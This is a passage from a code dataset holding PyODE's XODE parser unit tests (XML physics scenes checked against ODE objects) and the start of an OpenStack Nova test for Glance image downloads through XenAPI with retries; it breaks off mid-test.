repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (string, 990 classes) | size (string, 4-7 chars) | content (string, 666-1.03M chars) | license (string, 15 classes) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
coiax/pyode | tests/test_xode.py | 2 | 30688 | #!/usr/bin/env python
######################################################################
# Python Open Dynamics Engine Wrapper
# Copyright (C) 2004 PyODE developers (see file AUTHORS)
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of EITHER:
# (1) The GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at
# your option) any later version. The text of the GNU Lesser
# General Public License is included with this library in the
# file LICENSE.
# (2) The BSD-style license that is included with this library in
# the file LICENSE-BSD.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the files
# LICENSE and LICENSE-BSD for more details.
######################################################################
import unittest
import ode
import math
from xode import node, transform, parser, errors
test_doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode>
<world name="world1">
<transform>
<matrix4f m00="1.0" m01="2.0" m02="3.0" m03="4.0"
m10="1.2" m11="2.2" m12="3.2" m13="4.2"
m20="1.4" m21="2.4" m22="3.4" m23="4.4"
m30="1.8" m31="2.8" m32="3.8" m33="4.8"/>
</transform>
<space name="space1">
<body name="body0">
<mass name="mass0" />
</body>
<body name="body1" enabled="false" gravitymode="0">
<transform scale="2.0">
<position x="10.0" y="11.0" z="12.0"/>
<rotation>
<euler x="45.0" y="45.0" z="45.0" aformat="radians"/>
</rotation>
</transform>
<torque x="1.0" y="2.0" z="3.0"/>
<force x="2.0" y="3.0" z="4.0"/>
<finiteRotation mode="1" xaxis="1.0" yaxis="1.0" zaxis="1.0"/>
<linearVel x="1.0" y="2.0" z="3.0"/>
<angularVel x="3.0" y="2.0" z="1.0"/>
<mass name="mass1">
<mass_shape density="1.0">
<sphere radius="1.0"/>
</mass_shape>
<mass name="mass2">
<mass_shape density="2.0">
<sphere radius="10.0"/>
</mass_shape>
<adjust total="4.0"/>
</mass>
</mass>
<joint name="joint1">
<ball>
<anchor x="1.0" y="2.0" z="3.0"/>
</ball>
</joint>
<geom name="geom1">
<box sizex="10" sizey="20" sizez="30"/>
</geom>
</body>
<body name="body2">
<joint name="joint2">
<link1 body="body1"/>
<ball/>
</joint>
</body>
<joint name="joint3">
<link1 body="body1"/>
<link2 body="body2"/>
<ball/>
</joint>
</space>
</world>
<world name="world2">
<space>
<body name="body3">
<transform>
<matrix4f m00="1.0" m01="0.0" m02="0.0" m03="0.0"
m10="0.0" m11="1.0" m12="0.0" m13="0.0"
m20="0.0" m21="0.0" m22="1.0" m23="0.0"
m30="10.0" m31="20.0" m32="30.0" m33="0.0"/>
</transform>
</body>
<body name="body4">
<transform>
<position x="1" y="1" z="1"/>
</transform>
<body name="body5">
<transform>
<position x="2" y="2" z="2"/>
</transform>
</body>
</body>
<body name="body6">
<transform>
<rotation>
<euler x="0" y="0" z="0.78" aformat="radians"/>
</rotation>
</transform>
<body name="body7">
<transform absolute="true">
<matrix4f m00="1.0" m01="2.0" m02="3.0" m03="4.0"
m10="1.2" m11="2.2" m12="3.2" m13="4.2"
m20="1.4" m21="2.4" m22="3.4" m23="4.4"
m30="1.8" m31="2.8" m32="3.8" m33="4.8"/>
</transform>
<geom name="geom6">
<transform>
<position x="1.0" y="2.0" z="3.0"/>
<rotation>
<euler x="0.78" y="0" z="0" aformat="radians"/>
</rotation>
</transform>
<sphere radius="1.0"/>
</geom>
</body>
</body>
<geom name="geom2">
<cappedCylinder radius="15.0" length="3.0"/>
</geom>
<geom name="geom3">
<ray length="11.0"/>
<geom name="geom4">
<plane a="0.0" b="1.0" c="0.0" d="17.0"/>
</geom>
<geom name="geom5">
<transform>
<position x="1.0" y="2.0" z="3.0"/>
<rotation>
<euler x="0.0" y="0.0" z="0.78" aformat="radians"/>
</rotation>
</transform>
<sphere radius="23.0"/>
</geom>
</geom>
<joint name="joint4">
<link1 body="body4"/>
<link2 body="body6"/>
<fixed/>
</joint>
<joint name="joint5">
<link1 body="body4"/>
<link2 body="body6"/>
<hinge>
<axis x="1.0" y="0.0" z="0.0"/>
</hinge>
</joint>
<joint name="joint6">
<link1 body="body4"/>
<link2 body="body6"/>
<slider>
<axis x="0.0" y="1.0" z="0.0"
LowStop="1.0"
HiStop="2.0"
Vel="3.0"
FMax="4.0"
FudgeFactor="0.5"
Bounce="6.0"
CFM="7.0"
StopERP="8.0"
StopCFM="9.0" />
</slider>
</joint>
<joint name="joint7">
<link1 body="body4"/>
<link2 body="body6"/>
<universal>
<axis x="1.0" y="0.0" z="0.0"/>
<axis x="0.0" y="1.0" z="0.0"/>
</universal>
</joint>
<joint name="joint8">
<link1 body="body4"/>
<link2 body="body6"/>
<hinge2>
<axis x="0.0" y="0.0" z="1.0"
SuspensionERP="2.0"
SuspensionCFM="3.0" />
<axis x="0.0" y="1.0" z="0.0"
FudgeFactor="0.2" />
</hinge2>
</joint>
<joint name="joint9">
<link1 body="body4"/>
<link2 body="body6"/>
<amotor>
<axis x="0.0" y="1.0" z="0.0"/>
</amotor>
</joint>
<joint name="joint10">
<link1 body="body4"/>
<link2 body="body6"/>
<amotor>
<axis x="1.0" y="0.0" z="0.0"/>
<axis x="0.0" y="1.0" z="0.0"/>
<axis x="0.0" y="0.0" z="1.0"/>
</amotor>
</joint>
</space>
</world>
</xode>'''
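# Illustrative usage sketch (not part of the original suite): the XODE document above
# is consumed through xode.parser exactly as the TestParser fixtures below do. Assuming
# the same imports, parsing it and looking up a named node works like this:
#
#     p = parser.Parser()
#     root = p.parseString(test_doc)
#     body1 = root.namedChild('body1').getODEObject()   # an ode.Body instance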
trimesh_doc='''<?xml version="1.0" encoding="iso-8859-1"?>
<xode>
<world>
<space>
<geom name="trimesh1">
<trimesh>
<vertices>
<v x="0" y="1" z="1" />
<v x="1" y="2" z="2" />
<v x="2" y="0" z="1" />
<v x="0" y="1" z="2" />
<v x="2" y="2" z="1" />
</vertices>
<triangles>
<t ia="1" ib="2" ic="3" />
<t ia="2" ib="1" ic="4" />
<t ia="3" ib="2" ic="1" />
</triangles>
</trimesh>
</geom>
</space>
</world>
</xode>
'''
def feq(n1, n2, error=0.1):
"""
Compare two floating point numbers. If they differ by less than C{error},
return True; otherwise, return False.
"""
n = math.fabs(n1 - n2)
if (n <= error):
return True
else:
return False
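# Illustrative example with the default tolerance of 0.1:
#     feq(0.30000000000000004, 0.3)   # True  (difference well below 0.1)
#     feq(1.0, 1.2)                   # False (difference of 0.2 exceeds 0.1)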
class Class1:
pass
class Class2:
pass
class TestTreeNode(unittest.TestCase):
def setUp(self):
self.node1 = node.TreeNode('node1', None)
self.node2 = node.TreeNode('node2', self.node1)
self.node3 = node.TreeNode('node3', self.node2)
self.node4 = node.TreeNode('node4', self.node3)
self.t2 = transform.Transform()
self.t2.scale(2.0, 3.0, 4.0)
self.node2.setNodeTransform(self.t2)
self.t3 = transform.Transform()
self.t3.rotate(1.0, 2.0, 3.0)
self.node3.setNodeTransform(self.t3)
self.t4 = transform.Transform()
self.t4.translate(2.0, 3.0, 1.0)
self.node4.setNodeTransform(self.t4)
self.node1.setODEObject(Class2())
self.node2.setODEObject(Class2())
self.node3.setODEObject(Class1())
def testGetName(self):
self.assertEqual(self.node1.getName(), 'node1')
def testGetParent(self):
self.assertEqual(self.node2.getParent(), self.node1)
def testGetChildren(self):
self.assertEqual(self.node1.getChildren(), [self.node2])
self.assertEqual(self.node2.getChildren(), [self.node3])
self.assertEqual(self.node3.getChildren(), [self.node4])
self.assertEqual(self.node4.getChildren(), [])
def testNamedChildLocal(self):
self.assertEqual(self.node1.namedChild('node2'), self.node2)
def testNamedChildRemote(self):
self.assertEqual(self.node1.namedChild('node3'), self.node3)
def testNamedChildNotFound(self):
self.assertRaises(KeyError, self.node1.namedChild, 'undefined')
def testGetFirstAncestor(self):
self.assertEqual(self.node3.getFirstAncestor(Class2), self.node2)
def testGetFirstAncestorNotFound(self):
self.assertRaises(node.AncestorNotFoundError,
self.node3.getFirstAncestor, Class1)
def testInitialTransform(self):
t = transform.Transform()
t.setIdentity()
self.assertEqual(self.node1.getNodeTransform().m, t.m)
def testGetTransform(self):
ref = self.node1.getNodeTransform() * self.t2 * self.t3
self.assertEqual(self.node3.getTransform().m, ref.m)
def testGetTransformUntil(self):
ref = self.t3 * self.t4
self.assertEqual(self.node4.getTransform(self.node2).m, ref.m)
class TestParser(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
self.root = self.p.parseString(test_doc)
def assertEqualf(a, b):
self.assertEqual(feq(a, b), True)
self.assertEqualf = assertEqualf
class TestWorldParser(TestParser):
def testInstance(self):
world = self.root.namedChild('world1').getODEObject()
self.assert_(isinstance(world, ode.World))
class TestSpaceParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.simpleSpace = self.root.namedChild('space1').getODEObject()
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<space name="space1"/>
</world></xode>
'''
self.p2 = parser.Parser()
self.p2.setParams(spaceFactory=ode.HashSpace)
self.root2 = self.p2.parseString(doc)
self.hashSpace = self.root2.namedChild('space1').getODEObject()
def makeSpace():
return ode.QuadTreeSpace((0, 0, 0), (2, 2, 2), 3)
self.p3 = parser.Parser()
self.p3.setParams(spaceFactory=makeSpace)
self.root3 = self.p3.parseString(doc)
self.quadSpace = self.root3.namedChild('space1').getODEObject()
def testSimpleInstance(self):
self.assert_(isinstance(self.simpleSpace, ode.SimpleSpace))
def testHashInstance(self):
self.assert_(isinstance(self.hashSpace, ode.HashSpace))
def testQuadInstance(self):
self.assert_(isinstance(self.quadSpace, ode.QuadTreeSpace))
def testSpaceBase(self):
self.assert_(isinstance(self.simpleSpace, ode.SpaceBase))
self.assert_(isinstance(self.hashSpace, ode.SpaceBase))
self.assert_(isinstance(self.quadSpace, ode.SpaceBase))
class TestBodyParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.body1 = self.root.namedChild('body1').getODEObject()
self.body3 = self.root.namedChild('body3').getODEObject()
self.body6 = self.root.namedChild('body6').getODEObject()
def testInstance(self):
self.assert_(isinstance(self.body1, ode.Body))
def testRotation(self):
ref = transform.Transform()
ref.rotate(0.0, 0.0, 0.78)
rot = self.body6.getRotation()
for n1, n2 in zip(ref.getRotation(), rot):
self.assert_(feq(n1, n2))
def testPosition(self):
self.assertEqual(self.body3.getPosition(), (10.0, 20.0, 30.0))
def testEnable(self):
self.assertEqual(self.body1.isEnabled(), 0)
def testGravityMode(self):
self.assertEqual(self.body1.getGravityMode(), 0)
def testTorque(self):
self.assertEqual(self.body1.getTorque(), (1.0, 2.0, 3.0))
def testForce(self):
self.assertEqual(self.body1.getForce(), (2.0, 3.0, 4.0))
def testFiniteRotation(self):
self.assertEqual(self.body1.getFiniteRotationMode(), 1)
x, y, z = self.body1.getFiniteRotationAxis()
self.assertEqual(x, y)
self.assertEqual(y, z)
def testLinearVel(self):
self.assertEqual(self.body1.getLinearVel(), (1.0, 2.0, 3.0))
def testAngularVel(self):
self.assertEqual(self.body1.getAngularVel(), (3.0, 2.0, 1.0))
class TestMassParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.mass0 = self.root.namedChild('mass0').getODEObject()
self.mass1 = self.root.namedChild('mass1').getODEObject()
self.mass2 = self.root.namedChild('mass2').getODEObject()
self.ref1 = ode.Mass()
self.ref1.setSphere(1.0, 1.0)
self.ref2 = ode.Mass()
self.ref2.setSphere(2.0, 10.0)
self.ref2.adjust(4.0)
def testInstance(self):
self.assert_(isinstance(self.mass1, ode.Mass))
def testDefault(self):
self.assertEqual(self.mass0.c, self.ref1.c)
self.assertEqual(self.mass0.I, self.ref1.I)
self.assertEqual(self.mass0.mass, self.ref1.mass)
def testTotal(self):
self.assertEqual(self.mass2.mass, 4.0)
def testSphere(self):
self.assertEqual(self.ref2.c, self.mass2.c)
self.assertEqual(self.ref2.I, self.mass2.I)
def testAdd(self):
ref = ode.Mass()
ref.setSphere(1.0, 1.0)
ref.add(self.ref2)
self.assertEqual(ref.c, self.mass1.c)
self.assertEqual(ref.I, self.mass1.I)
class TestJointParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.body1 = self.root.namedChild('body1').getODEObject()
self.body2 = self.root.namedChild('body2').getODEObject()
self.joint1 = self.root.namedChild('joint1').getODEObject()
self.joint2 = self.root.namedChild('joint2').getODEObject()
self.joint3 = self.root.namedChild('joint3').getODEObject()
self.joint4 = self.root.namedChild('joint4').getODEObject()
self.joint5 = self.root.namedChild('joint5').getODEObject()
self.joint6 = self.root.namedChild('joint6').getODEObject()
self.joint7 = self.root.namedChild('joint7').getODEObject()
self.joint8 = self.root.namedChild('joint8').getODEObject()
self.joint9 = self.root.namedChild('joint9').getODEObject()
self.joint10 = self.root.namedChild('joint10').getODEObject()
def testBallInstance(self):
self.assert_(isinstance(self.joint1, ode.BallJoint))
def testBodyAncestor(self):
self.assertEqual(self.joint1.getBody(0), self.body1)
def testEnvironment(self):
self.assertEqual(self.joint1.getBody(1), ode.environment)
def testBodyReference(self):
self.assertEqual(self.joint2.getBody(0), self.body1)
def testSpaceParent(self):
self.assertEqual(self.joint3.getBody(0), self.body1)
self.assertEqual(self.joint3.getBody(1), self.body2)
def testBallAnchor(self):
for n1, n2 in zip(self.joint1.getAnchor(), (1.0, 2.0, 3.0)):
self.assert_(feq(n1, n2))
def testFixedInstance(self):
self.assert_(isinstance(self.joint4, ode.FixedJoint))
def testHingeInstance(self):
self.assert_(isinstance(self.joint5, ode.HingeJoint))
def testHingeAxis(self):
self.assertEqual(self.joint5.getAxis(), (1.0, 0.0, 0.0))
def testSliderInstance(self):
self.assert_(isinstance(self.joint6, ode.SliderJoint))
def testSliderAxis(self):
self.assertEqual(self.joint6.getAxis(), (0.0, 1.0, 0.0))
def testUniversalInstance(self):
self.assert_(isinstance(self.joint7, ode.UniversalJoint))
def testUniversalAxis1(self):
ref = (1.0, 0.0, 0.0)
axis1 = self.joint7.getAxis1()
for r, a in zip(ref, axis1):
self.assert_(feq(r, a))
def testUniversalAxis2(self):
ref = (0.0, 1.0, 0.0)
axis2 = self.joint7.getAxis2()
for r, a in zip(ref, axis2):
self.assert_(feq(r, a))
def testHinge2Instance(self):
self.assert_(isinstance(self.joint8, ode.Hinge2Joint))
def testHinge2Axis1(self):
ref = (0.0, 0.0, 1.0)
axis1 = self.joint8.getAxis1()
for r, a in zip(ref, axis1):
self.assert_(feq(r, a))
def testHinge2Axis2(self):
ref = (0.0, 1.0, 0.0)
axis2 = self.joint8.getAxis2()
for r, a in zip(ref, axis2):
self.assert_(feq(r, a))
def testAMotorInstance(self):
self.assert_(isinstance(self.joint9, ode.AMotor))
def testAMotorNumAxes1(self):
self.assertEqual(self.joint9.getNumAxes(), 1)
def testAMotorNumAxes3(self):
self.assertEqual(self.joint10.getNumAxes(), 3)
def testAMotorAxes1(self):
ref = (0.0, 1.0, 0.0)
axis1 = self.joint9.getAxis(0)
self.assertEqual(ref, axis1)
def testAMotorAxes3(self):
ref = [(1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0)]
axes = [self.joint10.getAxis(0), self.joint10.getAxis(1),
self.joint10.getAxis(2)]
self.assertEqual(ref, axes)
def testAxisParamLoStop(self):
self.assertEqualf(self.joint6.getParam(ode.paramLoStop), 1.0)
def testAxisParamHiStop(self):
self.assertEqualf(self.joint6.getParam(ode.paramHiStop), 2.0)
def testAxisParamVel(self):
self.assertEqualf(self.joint6.getParam(ode.paramVel), 3.0)
def testAxisParamFMax(self):
self.assertEqualf(self.joint6.getParam(ode.paramFMax), 4.0)
def testAxisParamFudgeFactor(self):
self.assertEqualf(self.joint6.getParam(ode.paramFudgeFactor), 0.5)
def testAxisParamBounce(self):
self.assertEqualf(self.joint6.getParam(ode.paramBounce), 6.0)
def testAxisParamCFM(self):
self.assertEqualf(self.joint6.getParam(ode.paramCFM), 7.0)
def testAxisParamStopERP(self):
self.assertEqualf(self.joint6.getParam(ode.paramStopERP), 8.0)
def testAxisParamStopCFM(self):
self.assertEqualf(self.joint6.getParam(ode.paramStopCFM), 9.0)
def testAxisParamSuspensionERP(self):
self.assertEqualf(self.joint8.getParam(ode.paramSuspensionERP), 2.0)
def testAxisParamSuspensionCFM(self):
self.assertEqualf(self.joint8.getParam(ode.paramSuspensionCFM), 3.0)
def testAxis2FudgeFactor(self):
self.assertEqualf(self.joint8.getParam(ode.ParamFudgeFactor2), 0.2)
class TestGeomParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.geom1 = self.root.namedChild('geom1').getODEObject()
self.geom2 = self.root.namedChild('geom2').getODEObject()
self.geom3 = self.root.namedChild('geom3').getODEObject()
self.geom4 = self.root.namedChild('geom4').getODEObject()
self.geom5 = self.root.namedChild('geom5').getODEObject()
self.geom6 = self.root.namedChild('geom6').getODEObject()
self.body1 = self.root.namedChild('body1').getODEObject()
self.space1 = self.root.namedChild('space1').getODEObject()
def testSpaceAncestor(self):
self.assertEqual(self.geom1.getSpace(), self.space1)
def testBodyAttach(self):
self.assertEqual(self.geom1.getBody(), self.body1)
def testBoxInstance(self):
self.assert_(isinstance(self.geom1, ode.GeomBox))
def testBoxSize(self):
self.assertEqual(self.geom1.getLengths(), (10.0, 20.0, 30.0))
def testCCylinderInstance(self):
self.assert_(isinstance(self.geom2, ode.GeomCCylinder))
def testCCylinderParams(self):
self.assertEqual(self.geom2.getParams(), (15.0, 3.0))
def testSphereInstance(self):
self.assert_(isinstance(self.geom5, ode.GeomSphere))
def testSphereRadius(self):
self.assertEqual(self.geom5.getRadius(), 23.0)
def testPlaneInstance(self):
self.assert_(isinstance(self.geom4, ode.GeomPlane))
def testPlaneParams(self):
self.assertEqual(self.geom4.getParams(), ((0.0, 1.0, 0.0), 17.0))
def testRayInstance(self):
self.assert_(isinstance(self.geom3, ode.GeomRay))
def testRayLength(self):
self.assertEqual(self.geom3.getLength(), 11.0)
def testIndependantRotation(self):
ref = transform.Transform()
ref.rotate(0.0, 0.0, 0.78)
for n1, n2 in zip(self.geom5.getRotation(), ref.getRotation()):
self.assert_(feq(n1, n2))
def testIndependantPosition(self):
self.assertEqual(self.geom5.getPosition(), (1.0, 2.0, 3.0))
def testTransformInstance(self):
self.assert_(isinstance(self.geom6, ode.GeomTransform))
def testTransformGeomInstance(self):
self.assert_(isinstance(self.geom6.getGeom(), ode.GeomSphere))
def testTransformPosition(self):
pos = self.geom6.getGeom().getPosition()
self.assertEqual(pos, (1.0, 2.0, 3.0))
def testTransformRotation(self):
ref = transform.Transform()
ref.rotate(0.78, 0.0, 0.0)
rot = self.geom6.getGeom().getRotation()
for n1, n2 in zip(rot, ref.getRotation()):
self.assert_(feq(n1, n2))
class TestTransformParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.world1 = self.root.namedChild('world1')
self.body1 = self.root.namedChild('body1')
self.body5 = self.root.namedChild('body5')
self.body7 = self.root.namedChild('body7')
def testMatrixStyle(self):
t = self.world1.getNodeTransform()
self.assertEqual(t.m, [[1.0, 2.0, 3.0, 4.0],
[1.2, 2.2, 3.2, 4.2],
[1.4, 2.4, 3.4, 4.4],
[1.8, 2.8, 3.8, 4.8]])
def testVector(self):
ref = transform.Transform()
ref.rotate(45.0, 45.0, 45.0)
ref.translate(10.0, 11.0, 12.0)
ref.scale(2.0, 2.0, 2.0)
self.assertEqual(self.body1.getNodeTransform().m, ref.m)
def testAbsolute(self):
t = self.body7.getTransform()
self.assertEqual(t.m, [[1.0, 2.0, 3.0, 4.0],
[1.2, 2.2, 3.2, 4.2],
[1.4, 2.4, 3.4, 4.4],
[1.8, 2.8, 3.8, 4.8]])
def testRelative(self):
t1 = transform.Transform()
t1.translate(1.0, 1.0, 1.0)
t2 = transform.Transform()
t2.translate(2.0, 2.0, 2.0)
t3 = t1 * t2
self.assertEqual(self.body5.getTransform().m, t3.m)
def testMultiply(self):
t1 = transform.Transform()
t2 = transform.Transform()
for r in range(4):
for c in range(4):
t1.m[r][c] = 1
t2.m[r][c] = 2
result = t1 * t2
for r in range(4):
for c in range(4):
self.assertEqual(result.m[r][c], 8)
def testInitialIdentity(self):
t = transform.Transform()
for r in range(4):
for c in range(4):
if (r == c):
self.assertEqual(t.m[r][c], 1)
else:
self.assertEqual(t.m[r][c], 0)
class TestTriMeshParser(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
self.root = self.p.parseString(trimesh_doc)
self.trimesh1 = self.root.namedChild('trimesh1').getODEObject()
def testInstance(self):
self.assert_(isinstance(self.trimesh1, ode.GeomTriMesh))
def testTriangles(self):
triangles = [(1, 2, 3),
(2, 1, 4),
(3, 2, 1)]
vertices = [(0.0, 1.0, 1.0),
(1.0, 2.0, 2.0),
(2.0, 0.0, 1.0),
(0.0, 1.0, 2.0),
(2.0, 2.0, 1.0)]
for i in range(len(triangles)):
tri = self.trimesh1.getTriangle(i)
ref = []
for v in triangles[i]:
ref.append(vertices[v-1])
self.assertEqual(tri, tuple(ref))
class TestInvalid(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
class TestInvalidTags(TestInvalid):
def testRoot(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<test></test>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testRootChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><test/></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testWorldChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<test/>
</world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testSpaceChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<test/>
</space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testMassChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<body>
<mass>
<test/>
</mass>
</body>
</space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testJointChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><joint><test/></joint></space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testGeomChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><geom><test/></geom></space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testTriMeshChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><geom><trimesh><test/>
</trimesh></geom></space></world></xode>
'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
class TestInvalidBody(TestInvalid):
def testBadVector(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<torque x="1"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testBodyEnable(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body enabled="unsure">
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testFiniteRotationMode(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<finiteRotation mode="99" xaxis="0" yaxis="0" zaxis="0"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testFiniteRotationAxes(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<finiteRotation mode="0" xaxis="0" yaxis="0"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
class TestInvalidJoint(TestInvalid):
def testEqualLinks(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<joint>
<ball/>
</joint>
</space></world></xode>'''
# both links are ode.environment
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testNoType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<joint/>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testWrongType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<joint>
<link1 body="body1"/>
<link2 body="space1"/>
<ball/>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testMisplacedReference(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<ball/>
</joint>
<body name="body2"/>
</space></world></xode>'''
# bodies must be defined before the joint
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testSliderAxes(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<body name="body2"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<slider>
</slider>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testInvalidParam(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<body name="body2"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<hinge>
<axis x="1.0" y="0.0" z="0.0" TestCFM="99.0"/>
</hinge>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
class TestInvalidGeom(TestInvalid):
def testNoType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<geom/>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
if (__name__ == '__main__'):
unittest.main()
| lgpl-2.1 | 129,536,766,369,157,010 | 30.029323 | 76 | 0.559209 | false |
yanheven/nova | nova/tests/unit/virt/xenapi/image/test_glance.py | 33 | 11630 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import time
import mock
from mox3 import mox
from oslo_log import log as logging
from nova.compute import utils as compute_utils
from nova import context
from nova import exception
from nova.tests.unit.virt.xenapi import stubs
from nova.virt.xenapi import driver as xenapi_conn
from nova.virt.xenapi import fake
from nova.virt.xenapi.image import glance
from nova.virt.xenapi import vm_utils
class TestGlanceStore(stubs.XenAPITestBaseNoDB):
def setUp(self):
super(TestGlanceStore, self).setUp()
self.store = glance.GlanceStore()
self.flags(host='1.1.1.1',
port=123,
api_insecure=False, group='glance')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
self.context = context.RequestContext(
'user', 'project', auth_token='foobar')
fake.reset()
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.stubs.Set(
vm_utils, 'get_sr_path', lambda *a, **kw: '/fake/sr/path')
self.instance = {'uuid': 'blah',
'system_metadata': [],
'auto_disk_config': True,
'os_type': 'default',
'xenapi_use_agent': 'true'}
def _get_params(self):
return {'image_id': 'fake_image_uuid',
'glance_host': '1.1.1.1',
'glance_port': 123,
'glance_use_ssl': False,
'sr_path': '/fake/sr/path',
'extra_headers': {'X-Service-Catalog': '[]',
'X-Auth-Token': 'foobar',
'X-Roles': '',
'X-Tenant-Id': 'project',
'X-User-Id': 'user',
'X-Identity-Status': 'Confirmed'}}
def _get_download_params(self):
params = self._get_params()
params['uuid_stack'] = ['uuid1']
return params
def test_download_image(self):
params = self._get_download_params()
self.stubs.Set(vm_utils, '_make_uuid_stack',
lambda *a, **kw: ['uuid1'])
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'download_vhd', **params)
self.mox.ReplayAll()
self.store.download_image(self.context, self.session,
self.instance, 'fake_image_uuid')
self.mox.VerifyAll()
@mock.patch.object(vm_utils, '_make_uuid_stack', return_value=['uuid1'])
@mock.patch.object(random, 'shuffle')
@mock.patch.object(time, 'sleep')
@mock.patch.object(compute_utils, 'add_instance_fault_from_exc')
@mock.patch.object(logging.getLogger('nova.virt.xenapi.client.session'),
'debug')
def test_download_image_retry(self, mock_log_debug, mock_fault, mock_sleep,
mock_shuffle, mock_make_uuid_stack):
params = self._get_download_params()
self.flags(num_retries=2, group='glance')
params.pop("glance_port")
params.pop("glance_host")
calls = [mock.call('glance', 'download_vhd', glance_port=9292,
glance_host='10.0.1.1', **params),
mock.call('glance', 'download_vhd', glance_port=9293,
glance_host='10.0.0.1', **params)]
log_calls = [mock.call(mock.ANY, {'callback_result': '10.0.1.1',
'attempts': 3, 'attempt': 1,
'fn': 'download_vhd',
'plugin': 'glance'}),
mock.call(mock.ANY, {'callback_result': '10.0.0.1',
'attempts': 3, 'attempt': 2,
'fn': 'download_vhd',
'plugin': 'glance'})]
glance_api_servers = ['10.0.1.1:9292',
'http://10.0.0.1:9293']
self.flags(api_servers=glance_api_servers, group='glance')
with (mock.patch.object(self.session, 'call_plugin_serialized')
) as mock_call_plugin_serialized:
error_details = ["", "", "RetryableError", ""]
error = self.session.XenAPI.Failure(details=error_details)
mock_call_plugin_serialized.side_effect = [error, "success"]
self.store.download_image(self.context, self.session,
self.instance, 'fake_image_uuid')
